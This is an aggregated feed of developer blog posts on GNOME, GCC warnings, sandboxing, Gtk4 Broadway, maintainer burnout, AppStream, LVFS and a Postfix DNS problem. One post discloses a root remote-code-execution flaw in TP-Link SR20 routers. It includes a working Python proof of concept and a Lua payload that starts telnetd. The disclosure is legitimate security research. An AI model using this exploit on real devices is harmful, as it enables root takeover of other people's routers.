On the closing day there was also a professional photographer taking pictures of anyone who volunteered. I took the opportunity to get a “GNOME + GitLab” photo, as I was wearing my GUADEC shirt and some of the GitLab development team was also present.

GNOME and GitLab join forces!

Thank you

I’d like to thank Hong Phuc for accepting my paper on such short notice, and all of the organizers and volunteers whose hard work helped to make this such a wonderful event.

And of course, thanks to Codethink for sponsoring my travel and allowing me to participate in this event!

Debarshi Ray: About -Wextra and -Wcast-function-type

Mon, 01/04/2019 - 1:07pm

About eight months ago, around the time when GCC 8.x started showing up on my computers, I started moving my code away from using -Wextra. This aligned nicely with the move to the Meson build system, but went against the flow of Autotools’ AX_COMPILER_FLAGS, which isn’t ideal but is an acceptable trade-off.

But why?

GCC 8.x added a warning called -Wcast-function-type to the -Wextra umbrella. It warns when a function pointer is cast to a function pointer of an incompatible type. At a glance, this seems desirable, but it isn’t. It runs contrary to one of the widely used C idioms in GNOME. For example, it’s triggered by this textbook use of g_list_copy_deep to copy a list of reference counted objects:

another_list = g_list_copy_deep (list, (GCopyFunc) g_object_ref, NULL);

Note that this is different from -Wincompatible-pointer-types, which would’ve triggered if the cast to GCopyFunc was missing:

another_list = g_list_copy_deep (list, g_object_ref, NULL);

It’s easy to imagine similar examples with uses of gtk_container_forall or gtk_container_foreach with gtk_widget_destroy, and so on.

The C standard (e.g., see section 6.5.2.2 of the C11 standard) steps around the issue of passing more arguments to a function than it actually has parameters for by calling it undefined behaviour. However, the calling conventions of all the platforms supported by GLib are defined in a way that makes this work.

So how do we disable -Wcast-function-type?

One option is to use a compiler directive with #pragma, as suggested by AX_COMPILER_FLAGS. However, attempts to ignore the warning through a #pragma on older versions of GCC that didn’t have this specific warning will trigger -Wpragmas; and, ironically, using G_GNUC_CHECK_VERSION to conditionally disable it on newer compilers will trigger -Wexpansion-to-defined, again because of -Wextra and the fact that the implementation of the macro has an #ifdef around __GNUC__. Regardless, for a warning that gets triggered by such a widely used programming construct, it would lead to a ton of boilerplate all over the codebase, instead of being a solitary exception tucked away in one corner of the project.
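
To make the trade-off concrete, every affected call site would need wrapping along these lines:

/* boilerplate needed at each call site, before even guarding
 * against compilers that predate the warning */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wcast-function-type"
another_list = g_list_copy_deep (list, (GCopyFunc) g_object_ref, NULL);
#pragma GCC diagnostic pop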

Therefore, my preference has been to append -Wno-cast-function-type and -Wno-error=cast-function-type to the list of compiler flags of modules using -Wextra. This avoids almost all of the above problems. One small wrinkle is that if a translation unit or file does trigger some other unrelated diagnostic, then an older compiler will also emit -Wunknown-warning for the presence of the unknown -Wno-cast-function-type flag. I find this acceptable because, in the first place, a file shouldn’t trigger any other diagnostic, especially on an older compiler, and if there does happen to be something, say a deprecation warning, then it’s likely something that needs to be fixed anyway.

Given that this can repeat with future versions of GCC, it seems wiser to avoid -Wextra and instead explicitly list out the desired compiler warnings. This isn’t hard to do because the GCC documentation clearly marks which warnings are turned on by -Wextra, -Wpedantic, etc.

Christian Hergert: Designing for Sandboxes

Mon, 01/04/2019 - 8:36am

One of the things I talked about in my talk at Scale 17x is that there are a number of platform features coming that are inevitable.

One of those is application sandboxing.

But not every component within an application is created equal or deserves equal access to user data and system configuration. Building the next big application increasingly requires thinking about how you segment applications into security domains.

Given the constraints of our current operating systems, that generally means processes. Google’s Chrome was one of the first major applications to do this. The Chrome team created a series of processes focused on different features. Each of those processes had capabilities (such as network or GPU access) removed from its process space to reduce the damage of an attack.

Recently Google released sandboxed-api, which is an interesting idea around automatically sandboxing libraries on Linux. While interesting, limiting myself to designs that are Linux-only is not currently realistic for my projects.

Since I happen to work on an IDE, one of the technologies I’ve had to become familiar with is Microsoft’s Language Server Protocol. It’s a design for worker processes to provide language-specific features.

It usually works like this:

  • Spawn a worker process, with a set of pipe()s for stdin/stdout you control
  • Use JSONRPC over the pipe()s with some well-formatted JSON commands

This design can be good for sandboxing because it allows you to spawn subprocesses with reduced system capabilities, easily clean up after them, and it provides an IPC format. Despite having written jsonrpc-glib and a number of helpers to make writing JSON from C rather clean, I’m still unhappy with it for a number of reasons, ranging from performance to correctness to the brittleness of nonconforming implementations.

I’d like to use this design in more than just Builder, but those applications are more demanding. They require passing FDs across the process boundary. (Also, I’m sick of hand-writing JSON RPCs and I don’t want to do that anymore.)

Thankfully, we’ve had this great RPC system for years that fits the bill if you reuse the serialization format: DBus.

  • No ties to a DBus daemon
  • GDBus in GLib has a full implementation that plays well with async/sync code
  • gdbus-codegen can generate our RPC stubs and proxies
  • Well defined interfaces in XML files (a hypothetical example follows below)
  • Generated code does type enforcement to ensure contracts
  • We can easily pass FDs across the process boundary, useful for memfd/tmpfs/shm
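
For instance, a hypothetical worker interface (not Builder's actual one) that gdbus-codegen can turn into typed stubs and proxies, including a file-descriptor argument, might look like:

<!-- org.example.GitWorker.xml: 'h' is the D-Bus file-descriptor type -->
<node>
  <interface name="org.example.GitWorker">
    <method name="CloneRepository">
      <arg type="s" name="url" direction="in"/>
      <arg type="s" name="destination" direction="in"/>
      <arg type="h" name="progress_fd" direction="in"/>
      <arg type="b" name="success" direction="out"/>
    </method>
  </interface>
</node>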

To set up the sandboxes, we can use tools like flatpak-spawn or bwrap on Linux to restrict process capabilities before launching the target process. Stdin/stdout is left untouched so that we can communicate with the subprocess even after capabilities are dropped.

Before I (re)settled on DBus, I tried a number of other prototypes. That included writing an interface language/codegen for JSONRPC, using libvarlink, Thrift’s c_glib compiler and protobufs. I’m actually surprised I was happiest with the DBus implementation, but that’s how it goes sometimes.

While I don’t expect a lot of sandboxing around our Git support in Builder, I did use it as an opportunity to prototype what this multi-process design looks like. If you’re interested in checking it out, you can find the worker sources here.

What excites me about the future is how this type of design could be used to sandbox image loaders like GdkPixbuf. One could quite trivially have an RPC that passes a sealed memfd for compressed image contents and returns a memfd for the decoded framebuffer or pre-compressed GPU textures. Keep that process around a little while to avoid fork()/exec() overhead, and we gain a bit of robustness with very little performance drawbacks.

Alexander Larsson: Broadway adventures in Gtk4

Fri, 29/03/2019 - 4:20pm

One of my long-running side projects is a Gtk backend called “Broadway”. Instead of rendering to the screen this backend creates an HTTP server that you can connect to, and then exposes the UI remotely in the browser.

The original version of Broadway essentially streamed image frames, although there were various ways to optimize what got sent. This matches pretty well with how Gtk 3 rendering works, particularly on Wayland: every frame it calls out to all widgets, letting them draw on top of a buffer, and then sends the final frame to the compositor. Broadway just inserts some image delta computation and JavaScript magic in the middle of this.

Enter Gtk 4, breaking everything!

However, time moves on, and the current development branch of Gtk (which will be Gtk 4) has completely changed how rendering works, with the goal of doing efficient rendering on modern GPUs.

In the new model widgets don’t directly render to a buffer. Instead they build up a model of how the final result should look in terms of something called render nodes. These describe rendering as a tree of high-level operations. The backend (we have software, OpenGL and Vulkan backends) then knows how to take this description and submit it to the GPU in an efficient way. This is somewhat similar to the Firefox WebRender project.

It would be possible to implement the broadway backend by hooking up the software renderer, letting it generate a buffer and then sending that to the browser. However, that is pretty lame!

CSS comes to the rescue!

Instead I’ve been looking at making the browser actually draw the render nodes. Gtk defines a lot of its UI in terms of CSS these days, and that means that the render nodes actually are very close to the CSS rendering model. For example, the basic drawing operation are things like rounded boxes with borders, shadows, etc.

So, I was thinking: could we not take these render nodes and turn them into actual DOM nodes with CSS styles and send them to the browser? Then every frame we can just diff the DOM trees, sending the minimal changes necessary.
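
As a purely illustrative example (all values invented), a render node for a styled button background could end up in the DOM as something like:

<!-- one Gtk render node expressed as an absolutely positioned div -->
<div style="position: absolute; left: 10px; top: 10px;
            width: 120px; height: 32px;
            border: 1px solid #cdc7c2; border-radius: 5px;
            box-shadow: 0 1px 2px rgba(0, 0, 0, 0.2);
            background: linear-gradient(to bottom, #f6f5f4, #edebe9);"></div>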

Sounds crazy right? But, it turns out to work pretty well.

Check out this example page which I created with the magic of “save as”. In particular, try zooming into that page in the browser, and play with the developer tools inspector to see the nodes. Here is a part of it zoomed in:

The icons and the text are not CSS, so they don’t scale, but look at those gorgeous borders, shadows and gradients!

Entering the 3rd dimension!

Particularly interesting is the support in Gtk for general 3D transforms. This maps well to the CSS transform property in the browser.

Check out this example of a spinning-cube transition. If you open up the browser inspector you can see that each individual element in the cube is still a regular CSS box.

Some technical notes

If you look at the examples above they all use data: uris for images. This is a custom mode that lets “screenshots” like the above work. Normally broadway uses blobs for the images.

Also, looking at the examples they seem very heavy in terms of images, as all the text is images. However, in a typical frame most of the render tree is identical to the previous frame, meaning any label that was used in the last frame need not be sent again. In fact, even if it changes position in the tree due to a parent node changing (scrolling, cube-switching, etc.) it can still be reused as-is.

However, text is clearly the weak point in here. Unfortunately HTML/CSS has no low-level text rendering APIs we could use. I’m considering generating a texture atlas with pre-rendered glyphs that can be reused (like CSS sprites) when rendering text, that would mean we will have to download less data at least. If anyone has other ideas I would love to hear about it.

Georges Basile Stavracas Neto: On Being a Free Software Maintainer

Fri, 29/03/2019 - 3:08am

Year is 2013. I learn about a new, alpha-quality project called “GNOME Calendar.” Intriguing.

I like calendars.

“Cool, I’ll track that,” said my younger self. Heavy development was happening at the ui-rework branch. Every day, a few new commits. Pull, build, test. Except one day, no new commits. Nor the next day. Or week. Or month. Or year. I’m disappointed. Didn’t want that project to die. You know…

I like calendars.

“Nope. Not gonna happen,” also said my younger self. Clone, build, fix bugs, send patches. Maintainer’s interest in the project is renewed. We get a new icon, things get serious. We go to a new IRC room (!) and make the first public release of GNOME Calendar.

One year passes, it is now 2015. After contributing for more than a year, Erick made me the de facto GNOME Calendar maintainer ¹. A mix of positive emotions flows: proud of the achievement; excitement for being able to carry on with my ideas for the future of the application; fear, for the weight of the responsibility.

But heck, I am a free software maintainer now.

That was 4 years ago. Time passes, things happen, experience is built. Experience that differs from what I originally expected.

Being a free software maintainer is a funny place to find yourself in. Good things came from it. Bad things too. Also terrible. And weird.

Naturally, there is a strong sense of achievement when you, well, achieve maintainership of a project. Usually, getting there requires a large number of interactions during a long period of time. It means you are trusted. It means you are trustworthy. It means you are skilled enough.

It also usually means stronger community bonds. Getting to know excellent people, that know a lot and are willing to share and mentor and help, is a life-changing experience. There is a huge human value in being surrounded by great people.

For those of us who enjoy coding, hooray! Full plate. Planning releases, coding and doing reviews can be fun too. You will fix problems, find solutions, think and design your code. There is a plethora of problems to fix in this plane of existence, and you have the chance to independently fix a few of them by yourself.

And people. There are good people in this planet. You eventually will receive a thank you email, or you will be paid a coffee. One way or another, people find their way to you.

People really do find their way to you.

See, sometimes the software you maintain, well, it crashes. It may lose someone’s data. Someone may trigger a unique condition inside the code that you never managed to do. These people may get angry, sad, and frustrated ².

And they will find their way to you.

You will be demanded to fix your software. You will be shouted at. Sometimes, the line may be crossed, and you will be abused. “How dare you not (use your free time to) fix this ultra high priority bug that is affecting me?” or “This is an absolutely basic feature! How is it not implemented yet (by you on your free time)?!” or even “You made me move to Software Y, and you need to win me back” are going to be realities you will have to face.

You may get emotional about your code. You may feel ashamed of what you did, and do. After all, your code has bugs, there are numerous issues opened at your bug tracker, and people are complaining non-stop. (Oh and, naturally, there will be someone who will try their best to put you down with that.)

At one point, you will look at your issue backlog and feel a subtle despair when you realise you won’t ever be able to fix all the bugs.

If you are open to reviewing other people’s contributions, there is a high chance you will find challengers disguised as contributors. And your code review will be treated as an intellectual battle between good and evil. And you will need to explain and clarify over and over, and deal with circular logic, and pretty much any tool people might use to win battles instead of improving their code. And that is incredibly tiresome.

You will be told that you need to develop a thick skin. To ignore that, let it go, think positive and don’t pay attention to all the shit that is being thrown at you and why are you so goddamn negative you’re a maintainer for christ sake.

You may no longer feel any joy in what you work on. You may want to move on. You may also not do that, due to the sense of responsibility you have to your code, your community, and the people who use your software.

Unfortunately, being a free software maintainer may exact a high price on your psychological and emotional health.

Four years ago, I certainly did not know that.

¹ – And by “maintainer”, I am talking about being an upstream code maintainer, not package maintainer.
² – Rightfully so. Nobody wants to lose their stuff, or have their workflow broken.

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

Enj, 28/03/2019 - 11:20md
The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.
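The rough triage steps look like this (a sketch; the firmware file name and the extracted path of the tddp binary are illustrative, not taken from the post):

$ binwalk -e sr20_firmware.bin                               # extract the firmware image
$ arm-linux-gnu-nm -D squashfs-root/usr/bin/tddp | grep popen  # list dynamic symbols, look for popen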

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64];
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}

Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address), which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:

#!/usr/bin/python3
# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename

import binascii
import socket
import sys  # needed for sys.argv; missing from the original listing

port_send = 1040
port_receive = 61000

tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 0

tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])

sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))

# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()

response, addr = sock_receive.recvfrom(1024)
r = response.hex()  # bytes.hex(); str.encode('hex') is Python 2 only
print(r)
[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch


Richard Hughes: New AppStream Validation Requirements

Enj, 28/03/2019 - 5:36md

In the next release of appstream-glib the appstream-util validate requirements have changed, which might make your life easier or harder, depending on whether you already pass or fail the validation. The details are here, but the rough gist is that we’ve relaxed a lot of the style rules (e.g. starts with a capital letter, ends with a full stop, less than a certain number of chars, etc), and made stricter some of the more important optional parts of the specification. For instance, requiring <content_rating> for any desktop or console application.
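For instance, a minimal <content_rating> element using the OARS scheme might look like this (the attribute shown is purely illustrative; an empty element is also valid if no attributes apply):

<!-- Illustrative only; list whichever OARS attributes apply to your app. -->
<content_rating type="oars-1.1">
  <content_attribute id="violence-cartoon">none</content_attribute>
</content_rating>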

Even if you don’t care upstream, the new validation will soon be turned on for any apps built in Flathub, and downstream “packagers” will be pestering you for details as updates are now failing. Although only a few apps fail, some of the missing metadata tags are important enough to fail building. To test your app right now with the new validator:

$ flatpak remote-add --if-not-exists gnome-nightly https://sdk.gnome.org/gnome-nightly.flatpakrepo
$ flatpak install gnome-nightly org.gnome.Sdk
$ flatpak run --command=bash --filesystem=home:ro org.gnome.Sdk//master
# appstream-util validate /home/hughsie/Code/gnome-software/data/appdata/org.gnome.Software.appdata.xml.in
# exit

Of course, when the next tarball is released it’ll be available in your distribution as normal, but I wanted to get some early sanity checks in before I tag the release.

Christian Schaller: LVFS adopted by Linux Foundation

Enj, 28/03/2019 - 3:50md

Today the announcement went out that the Linux Vendor Firmware Service has become an official Linux Foundation service. For those that don’t know it yet, LVFS is a service that provides firmware for your Linux-running hardware, and it was one of our initial efforts as part of the Fedora Workstation push to drain the swamp in terms of making Linux a first-class desktop operating system.

The effort came about when Peter Jones, who is Red Hat’s representative to the UEFI standards body, approached me to talk about how Microsoft was pushing for a standardized way to ship UEFI firmware for Windows, and how UEFI being a standard opened a path for us to get full support for this without each vendor having to ship and maintain their own proprietary firmware tools. So we met with Peter Jones and also brought in Richard Hughes, who had already been looking at the problem of firmware updates in Linux, partly due to his ColorHug hardware. The effort got started with Peter working on the low-level OS tooling and Richard building the service to drive distribution, along with the work to integrate it all into GNOME Software. One concern we had, of course, was whether we could reach critical mass and get vendors interested, but luckily Dell was just as keen on improving firmware handling under Linux as we were and signed on from the start. Having Dell onboard gave the effort a lot of credibility, and as the service matured we ended up having more and more vendors sign up. We also reached out through Red Hat’s partnerships to push vendors to adopt it. As Richard also mentions in his interview about it, we had made the solution as similar to Microsoft’s as possible to lower the threshold for hardware vendors to join, the goal being that if they did the basic work to support Windows they could more or less ship the same firmware file to LVFS.

One issue that we had gone back and forth about inside Red Hat was the formal setup of the service. While we all agreed the service was hugely beneficial, it felt like something that should be a shared service for all of Linux, and we felt that if the service was Red Hat provided it might dissuade other vendors from joining. So we started looking around for a neutral place to land the service, while in the meantime LVFS had a sort of autonomous status, being run as a community effort by Richard Hughes. We ended up talking to Chris Wright, the Red Hat CTO, about the project, and he offered to facilitate contact with the Linux Foundation. The initial meetings were very positive, and the Linux Foundation seemed interested in running the service right from the start. It did end up taking us quite some time to clear all the formal and technical hurdles to get there, but I for one am very happy to see LVFS now being a vendor-neutral service provided by the Linux Foundation.

So a big thank you to Richard Hughes, Peter Jones, Chris Wright, Mario Limonciello, Dell, and the Linux Foundation for their help in getting us here. And also a big thank you to Fedora and the Fedora community for providing us a place to develop and polish up this service to the benefit of all. To me this is one of many examples of how Fedora keeps innovating and leading the way on desktop Linux.

Ismael Olea: Postfix: Name service error for name=domain.com type=MX: Host not found, try again

Enj, 28/03/2019 - 3:26md

I tried to post this in Serverfault but I couldn’t since it’s blocked by their spam detector.

Here is the full text of my question:

Hi:

I’m stuck with a Postfix MX related problem.

I’ve just migrated a very old CentOS 5 server to CentOS 7, so I’m using postfix-2.10.1-7.el7.x86_64. I’ve upgraded the legacy Postfix configuration (maybe the cause of this hell) and other supplementary stuff, which seems to work:

  • postfix-perl-scripts-2.10.1-7.el7.x86_64
  • postgrey-1.34-12.el7.noarch
  • amavisd-new-2.11.1-1.el7.noarch
  • spamassassin-3.4.0-4.el7_5.x86_64
  • perl-Mail-SPF-2.8.0-4.el7.noarch
  • perl-Mail-DKIM-0.39-8.el7.noarch
  • dovecot-2.2.36-3.el7.x86_64

After many tribulations I think I have most of the system running, except for the annoying MX-related problems, such as these (from /var/log/maillog):

Mar 28 14:26:48 tormento postfix/smtpd[1021]: warning: Unable to look up MX host for spmailtechn.com: Host not found, try again
Mar 28 14:26:51 tormento postfix/smtpd[1052]: warning: Unable to look up MX host for inlumine.ual.es: Host not found, try again
Mar 28 14:31:38 tormento postfix/smtpd[1442]: warning: Unable to look up MX host for aol.com: Host not found, try again
Mar 28 13:07:53 tormento postfix/smtpd[26556]: warning: Unable to look up MX host for hotmail.com: Host not found, try again
Mar 28 13:12:06 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for facebookmail.com: Host not found, try again
Mar 28 13:12:31 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for joker.com: Host not found, try again
Mar 28 13:13:02 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for bounce.linkedin.com: Host not found, try again

and:

Mar 28 14:50:36 tormento postfix/smtp[1700]: 7B6C69C6A2: to=<ismael.olea@gmail.com>, orig_to=<ismael@olea.org>, relay=none, delay=1142, delays=1142/0.07/0/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=gmail.com type=MX: Host not found, try again)
Mar 28 14:32:05 tormento postfix/smtp[1383]: 721A19C688: to=<XXXXX@yahoo.com>, orig_to=<XXXX@olea.org>, relay=none, delay=4742, delays=4742/0/0/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=yahoo.com type=MX: Host not found, try again)

as examples.

The first suspect is DNS resolution, but this works both with Hetzner’s DNS servers (where the machine is hosted) and with 8.8.8.8 or 9.9.9.9:

$ dig mx gmail.com

; <<>> DiG 9.9.4-RedHat-9.9.4-73.el7_6 <<>> mx gmail.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20330
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;gmail.com.			IN	MX

;; ANSWER SECTION:
gmail.com.		3014	IN	MX	10 alt1.gmail-smtp-in.l.google.com.
gmail.com.		3014	IN	MX	5 gmail-smtp-in.l.google.com.
gmail.com.		3014	IN	MX	40 alt4.gmail-smtp-in.l.google.com.
gmail.com.		3014	IN	MX	20 alt2.gmail-smtp-in.l.google.com.
gmail.com.		3014	IN	MX	30 alt3.gmail-smtp-in.l.google.com.

;; Query time: 1 msec
;; SERVER: 213.133.100.100#53(213.133.100.100)
;; WHEN: jue mar 28 14:56:00 CET 2019
;; MSG SIZE  rcvd: 161

or:

$ dig mx inlumine.ual.es

; <<>> DiG 9.9.4-RedHat-9.9.4-73.el7_6 <<>> mx inlumine.ual.es
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38239
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 2, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;inlumine.ual.es.		IN	MX

;; ANSWER SECTION:
inlumine.ual.es.	172800	IN	MX	1 ASPMX.L.GOOGLE.COM.
inlumine.ual.es.	172800	IN	MX	10 ASPMX3.GOOGLEMAIL.COM.
inlumine.ual.es.	172800	IN	MX	10 ASPMX2.GOOGLEMAIL.COM.
inlumine.ual.es.	172800	IN	MX	5 ALT1.ASPMX.L.GOOGLE.COM.
inlumine.ual.es.	172800	IN	MX	5 ALT2.ASPMX.L.GOOGLE.COM.

;; AUTHORITY SECTION:
inlumine.ual.es.	172800	IN	NS	dns.ual.es.
inlumine.ual.es.	172800	IN	NS	alboran.ual.es.

;; Query time: 113 msec
;; SERVER: 213.133.100.100#53(213.133.100.100)
;; WHEN: jue mar 28 14:56:51 CET 2019
;; MSG SIZE  rcvd: 217

my main.cf:

$ postconf -n
address_verify_sender = postmaster@olea.org
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
body_checks = regexp:/etc/postfix/body_checks.regexp
broken_sasl_auth_clients = yes
canonical_maps = hash:/etc/postfix/canonical
command_directory = /usr/sbin
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
data_directory = /var/lib/postfix
debug_peer_level = 2
debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin ddd $daemon_directory/$process_name $process_id & sleep 5
header_checks = pcre:/etc/postfix/header_checks.pcre
home_mailbox = Maildir/
html_directory = no
inet_interfaces = all
inet_protocols = ipv4
local_recipient_maps = proxy:unix:passwd.byname $alias_maps
mail_owner = postfix
mailbox_command = /usr/bin/procmail -a "$EXTENSION"
mailbox_size_limit = 200000000
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
message_size_limit = 30000000
mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain, tormento.olea.org, /etc/postfix/localdomains
myhostname = tormento.olea.org
newaliases_path = /usr/bin/newaliases.postfix
policy_time_limit = 3600
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.10.1/README_FILES
recipient_delimiter = +
sample_directory = /usr/share/doc/postfix-2.10.1/samples
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtp_tls_cert_file = /etc/pki/tls/certs/tormento.olea.org.crt.pem
smtp_tls_key_file = /etc/pki/tls/private/tormento.olea.org.key.pem
smtp_tls_mandatory_protocols = !SSLv2,!SSLv3
smtp_tls_note_starttls_offer = yes
smtp_tls_security_level = may
smtpd_helo_required = yes
smtpd_recipient_restrictions = permit_mynetworks check_client_access hash:/etc/postfix/access permit_sasl_authenticated reject_non_fqdn_recipient reject_non_fqdn_sender reject_rbl_client cbl.abuseat.org reject_rbl_client dnsbl-1.uceprotect.net reject_rbl_client zen.spamhaus.org reject_unauth_destination check_recipient_access hash:/etc/postfix/roleaccount_exceptions reject_multi_recipient_bounce check_helo_access pcre:/etc/postfix/helo_checks.pcre reject_non_fqdn_hostname reject_invalid_hostname check_sender_mx_access cidr:/etc/postfix/bogus_mx.cidr check_sender_access hash:/etc/postfix/rhsbl_sender_exceptions check_policy_service unix:postgrey/socket permit
smtpd_sasl_auth_enable = yes
smtpd_sasl_local_domain = $myhostname, olea.org, cacharreo.club
smtpd_sasl_path = private/auth
smtpd_sasl_security_options = noanonymous
smtpd_sasl_type = dovecot
smtpd_tls_auth_only = no
smtpd_tls_cert_file = /etc/pki/tls/certs/tormento.olea.org.crt.pem
smtpd_tls_key_file = /etc/pki/tls/private/tormento.olea.org.key.pem
smtpd_tls_loglevel = 1
smtpd_tls_mandatory_protocols = TLSv1
smtpd_tls_received_header = yes
smtpd_tls_security_level = may
smtpd_tls_session_cache_timeout = 3600s
tls_random_source = dev:/dev/urandom
transport_maps = hash:/etc/postfix/transport
unknown_local_recipient_reject_code = 550
virtual_maps = hash:/etc/postfix/virtual

and my master.cf:

$ postconf -M
smtp        inet  n  -  n  -      -  smtpd
submission  inet  n  -  n  -      -  smtpd -o smtpd_tls_security_level=may -o smtpd_sasl_auth_enable=yes -o cleanup_service_name=cleanup_submission -o content_filter=smtp-amavis:[127.0.0.1]:10023
smtps       inet  n  -  n  -      -  smtpd -o smtpd_tls_wrappermode=yes -o smtpd_sasl_auth_enable=yes
pickup      unix  n  -  n  60     1  pickup
cleanup     unix  n  -  n  -      0  cleanup
qmgr        unix  n  -  n  300    1  qmgr
tlsmgr      unix  -  -  n  1000?  1  tlsmgr
rewrite     unix  -  -  n  -      -  trivial-rewrite
bounce      unix  -  -  n  -      0  bounce
defer       unix  -  -  n  -      0  bounce
trace       unix  -  -  n  -      0  bounce
verify      unix  -  -  n  -      1  verify
flush       unix  n  -  n  1000?  0  flush
proxymap    unix  -  -  n  -      -  proxymap
proxywrite  unix  -  -  n  -      1  proxymap
smtp        unix  -  -  n  -      -  smtp
relay       unix  -  -  n  -      -  smtp -o fallback_relay=
showq       unix  n  -  n  -      -  showq
error       unix  -  -  n  -      -  error
retry       unix  -  -  n  -      -  error
discard     unix  -  -  n  -      -  discard
local       unix  -  n  n  -      -  local
virtual     unix  -  n  n  -      -  virtual
lmtp        unix  -  -  n  -      -  lmtp
anvil       unix  -  -  n  -      1  anvil
scache      unix  -  -  n  -      1  scache
smtp-amavis unix  -  -  n  -      2  smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes -o max_use=20
